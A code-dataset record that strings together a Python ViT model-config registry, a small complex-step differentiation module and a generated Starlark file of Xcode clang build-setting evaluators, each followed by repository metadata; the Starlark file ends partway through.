"""R+ViT-Ti/S16 w/ 8x8 patch hybrid @ 384 x 384."""
cfg = ViTConfig(
name="vit_tiny_r_s16_p8_384",
input_size=(384, 384),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(),
patch_size=8,
embed_dim=192,
nb_blocks=12,
nb_heads=3,
crop_pct=1.0,
first_conv="patch_embed/backbone/conv",
)
return ViT, cfg
@register_model
def vit_small_r26_s32_224():
"""R26+ViT-S/S32 hybrid."""
cfg = ViTConfig(
name="vit_small_r26_s32_224",
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(2, 2, 2, 2),
patch_size=1,
embed_dim=384,
nb_blocks=12,
nb_heads=6,
crop_pct=0.9,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg
@register_model
def vit_small_r26_s32_384():
"""R26+ViT-S/S32 hybrid."""
cfg = ViTConfig(
name="vit_small_r26_s32_384",
input_size=(384, 384),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(2, 2, 2, 2),
patch_size=1,
embed_dim=384,
nb_blocks=12,
nb_heads=6,
crop_pct=1.0,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg
@register_model
def vit_base_r50_s16_384():
"""
R50+ViT-B/16 hybrid from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-1k weights fine-tuned from in21k @ 384x384, source
https://github.com/google-research/vision_transformer.
"""
cfg = ViTConfig(
name="vit_base_r50_s16_384",
input_size=(384, 384),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(3, 4, 9),
patch_size=1,
embed_dim=768,
nb_blocks=12,
nb_heads=12,
crop_pct=1.0,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg
@register_model
def vit_large_r50_s32_224():
"""R50+ViT-L/S32 hybrid."""
cfg = ViTConfig(
name="vit_large_r50_s32_224",
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(3, 4, 6, 3),
patch_size=1,
embed_dim=1024,
nb_blocks=24,
nb_heads=16,
crop_pct=0.9,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg
@register_model
def vit_large_r50_s32_384():
"""R50+ViT-L/S32 hybrid."""
cfg = ViTConfig(
name="vit_large_r50_s32_384",
input_size=(384, 384),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(3, 4, 6, 3),
patch_size=1,
embed_dim=1024,
nb_blocks=24,
nb_heads=16,
crop_pct=1.0,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg
@register_model
def vit_tiny_r_s16_p8_224_in21k():
"""R+ViT-Ti/S16 w/ 8x8 patch hybrid. ImageNet-21k."""
cfg = ViTConfig(
name="vit_tiny_r_s16_p8_224_in21k",
nb_classes=21843,
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(),
patch_size=8,
embed_dim=192,
nb_blocks=12,
nb_heads=3,
crop_pct=0.9,
first_conv="patch_embed/backbone/conv",
)
return ViT, cfg
@register_model
def vit_small_r26_s32_224_in21k():
"""R26+ViT-S/S32 hybrid. ImageNet-21k."""
cfg = ViTConfig(
name="vit_small_r26_s32_224_in21k",
nb_classes=21843,
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(2, 2, 2, 2),
patch_size=1,
embed_dim=384,
nb_blocks=12,
nb_heads=6,
crop_pct=0.9,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg
@register_model
def vit_base_r50_s16_224_in21k():
"""
R50+ViT-B/16 hybrid model from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source
https://github.com/google-research/vision_transformer.
"""
cfg = ViTConfig(
name="vit_base_r50_s16_224_in21k",
nb_classes=21843,
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(3, 4, 9),
patch_size=1,
embed_dim=768,
nb_blocks=12,
nb_heads=12,
representation_size=768,
crop_pct=0.9,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg
@register_model
def vit_large_r50_s32_224_in21k():
"""R50+ViT-L/S32 hybrid. ImageNet-21k."""
cfg = ViTConfig(
name="vit_large_r50_s32_224_in21k",
nb_classes=21843,
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(3, 4, 6, 3),
patch_size=1,
embed_dim=1024,
nb_blocks=24,
nb_heads=16,
crop_pct=0.9,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg
| 25.84322 | 86 | 0.623217 | 866 | 6,099 | 4.090069 | 0.167436 | 0.049689 | 0.049689 | 0.059006 | 0.828628 | 0.813665 | 0.800678 | 0.79616 | 0.741107 | 0.714286 | 0 | 0.114685 | 0.260862 | 6,099 | 235 | 87 | 25.953191 | 0.671029 | 0.208723 | 0 | 0.786127 | 0 | 0 | 0.159721 | 0.11593 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063584 | false | 0 | 0.011561 | 0 | 0.138728 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f3baaa1539b1da24d9919ddc78924d56fe83b577 | 872 | py | Python | recolo/math_tools/complex_step_diff.py | PolymerGuy/recon | 14d66e3d5cb5fcc4868df326b045952daf139291 | [
"MIT"
] | 4 | 2021-10-14T19:52:05.000Z | 2022-03-10T11:41:34.000Z | recolo/math_tools/complex_step_diff.py | PolymerGuy/recolo | 05b14f0834fa675579eabdf43fac046259df19bb | [
"MIT"
] | null | null | null | recolo/math_tools/complex_step_diff.py | PolymerGuy/recolo | 05b14f0834fa675579eabdf43fac046259df19bb | [
"MIT"
] | 1 | 2022-03-04T13:09:01.000Z | 2022-03-04T13:09:01.000Z | import numpy as np
def dF_complex_x(func,x,y,step=1.e-6):
'''Complex step aproximation of first derivative'''
return np.imag(func(x + 1.j*step,y))/step
def ddF_complex_x(func,x,y,step=1.e-6):
'''Complex step aproximation of second derivative'''
return (2./step**2.)*(func(x,y)-np.real(func(x + 1.j*step,y)))
def ddF_complex_y(func,x,y,step=1.e-6):
'''Complex step aproximation of second derivative'''
return (2./step**2.)*(func(x,y)-np.real(func(x,y + 1.j*step)))
def dF_complex_y(func,x,y,step=1.e-6):
'''Complex step aproximation of first derivative'''
return np.imag(func(x,y + 1.j*step))/step
def ddF_complex_xy(func,x,y,step=1.e-6):
'''Complex step aproximation of derivative'''
return (1./step**2.) * (func(x,y) -np.real(func(x + 1.j*step ,y + 1.j*step)))-0.5*ddF_complex_x(func,x,y,step)-0.5*ddF_complex_y(func,x,y,step) | 41.52381 | 147 | 0.66055 | 174 | 872 | 3.229885 | 0.16092 | 0.133452 | 0.128114 | 0.124555 | 0.870107 | 0.855872 | 0.818505 | 0.733096 | 0.733096 | 0.733096 | 0 | 0.034256 | 0.129587 | 872 | 21 | 147 | 41.52381 | 0.706192 | 0.258028 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0.090909 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
f3c6f87f93630a459bbf5fe60d929156c8d5ff97 | 217,686 | bzl | Python | data/xcspec_evals.bzl | maxwellE/rules_ios | 256dd04107bc98e50ce4bbc2c85dad2b7bef677b | [
"Apache-2.0"
] | null | null | null | data/xcspec_evals.bzl | maxwellE/rules_ios | 256dd04107bc98e50ce4bbc2c85dad2b7bef677b | [
"Apache-2.0"
] | null | null | null | data/xcspec_evals.bzl | maxwellE/rules_ios | 256dd04107bc98e50ce4bbc2c85dad2b7bef677b | [
"Apache-2.0"
] | null | null | null | # Extracted from Xcode 11.6
# To update, in rules_ios run `bazel run data_generators:extract_xcspecs`
def _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_CLANG) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_CLANG"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__DefaultValue(xcconfigs, id_configs):
# $(CURRENT_ARCH)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CURRENT_ARCH"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_VARIANTS__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_CLANG) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_CLANG"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__arch__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_CLANG) != YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_CLANG"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "YES"))
def _com_apple_compilers_llvm_clang_1_0__diagnostic_message_length__DefaultValue(xcconfigs, id_configs):
# 0
return (False, "0")
def _com_apple_compilers_llvm_clang_1_0__print_note_include_stack__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MACRO_BACKTRACE_LIMIT__DefaultValue(xcconfigs, id_configs):
# 0
return (False, "0")
def _com_apple_compilers_llvm_clang_1_0__CLANG_RETAIN_COMMENTS_FROM_SYSTEM_HEADERS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_COLOR_DIAGNOSTICS__DefaultValue(xcconfigs, id_configs):
# $(COLOR_DIAGNOSTICS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "COLOR_DIAGNOSTICS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__GCC_INPUT_FILETYPE__DefaultValue(xcconfigs, id_configs):
# automatic
return (False, "automatic")
def _com_apple_compilers_llvm_clang_1_0__GCC_OPERATION__DefaultValue(xcconfigs, id_configs):
# compile
return (False, "compile")
def _com_apple_compilers_llvm_clang_1_0__GCC_USE_STANDARD_INCLUDE_SEARCHING__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_C_LANGUAGE_STANDARD__DefaultValue(xcconfigs, id_configs):
# compiler-default
return (False, "compiler-default")
def _com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LANGUAGE_STANDARD__DefaultValue(xcconfigs, id_configs):
# compiler-default
return (False, "compiler-default")
def _com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LIBRARY__DefaultValue(xcconfigs, id_configs):
# compiler-default
return (False, "compiler-default")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_ARC__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_WEAK__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_LINK_OBJC_RUNTIME__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_DEBUGGING__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__Condition(xcconfigs, id_configs):
# $(GCC_GENERATE_DEBUGGING_SYMBOLS) == YES && ( $(CLANG_ENABLE_MODULES) == YES || ( $(GCC_PREFIX_HEADER) != '' && $(GCC_PRECOMPILE_PREFIX_HEADER) == YES ) )
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_GENERATE_DEBUGGING_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "CLANG_ENABLE_MODULES"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "GCC_PREFIX_HEADER"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "GCC_PRECOMPILE_PREFIX_HEADER"
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
return (used_user_content, (eval_val_0 == "YES" and (eval_val_1 == "YES" or (eval_val_2 != "" and eval_val_3 == "YES"))))
def _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__DefaultValue(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULE_DEBUGGING)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULE_DEBUGGING"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__DefaultValue(xcconfigs, id_configs):
# $(MODULE_CACHE_DIR)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "MODULE_CACHE_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__DefaultValue(xcconfigs, id_configs):
# 86400
return (False, "86400")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__DefaultValue(xcconfigs, id_configs):
# 345600
return (False, "345600")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__DefaultValue(xcconfigs, id_configs):
# $(GCC_PREPROCESSOR_DEFINITIONS_NOT_USED_IN_PRECOMPS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_PREPROCESSOR_DEFINITIONS_NOT_USED_IN_PRECOMPS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES && $(DEFINES_MODULE) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "DEFINES_MODULE"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "YES" and eval_val_1 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_APP_EXTENSION__DefaultValue(xcconfigs, id_configs):
# $(APPLICATION_EXTENSION_API_ONLY)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "APPLICATION_EXTENSION_API_ONLY"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__GCC_CHAR_IS_UNSIGNED_CHAR__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_ASM_KEYWORD__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_BUILTIN_FUNCTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_TRIGRAPHS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_EXCEPTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_RTTI__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_PASCAL_STRINGS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_SHORT_ENUMS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_LINK_WITH_DYNAMIC_LIBRARIES__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_FLOATING_POINT_LIBRARY_CALLS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CPP_STATIC_DESTRUCTORS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_PREFIX_HEADER__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
